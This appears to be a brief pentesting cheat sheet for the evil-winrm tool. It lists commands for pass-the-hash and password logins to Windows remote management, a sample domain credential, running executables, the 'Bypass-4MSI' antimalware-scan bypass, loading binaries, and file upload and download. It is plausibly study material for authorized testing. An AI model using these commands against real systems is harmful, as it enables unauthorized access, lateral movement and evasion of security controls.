Evil-Winrm

evil-winrm -i $ip -u $UserName -H <HASH>

evil-winrm -i $files -u 'doamin\username' -p 'password'
# example:
# evil-winrm -i $files -u 'relia.com\username' -p 'vau!XCKjNQBv2$'

Run Executables File

evil-winrm -i $ip -u $UserName -p $PassWord -e $directory_location

Bypass-4MSI

menu

Invoke-Binary complete_location_of_Binary_on_kali

Upload or donwload file.

upload $Source $Detination
Download $Source $Detination

Last updated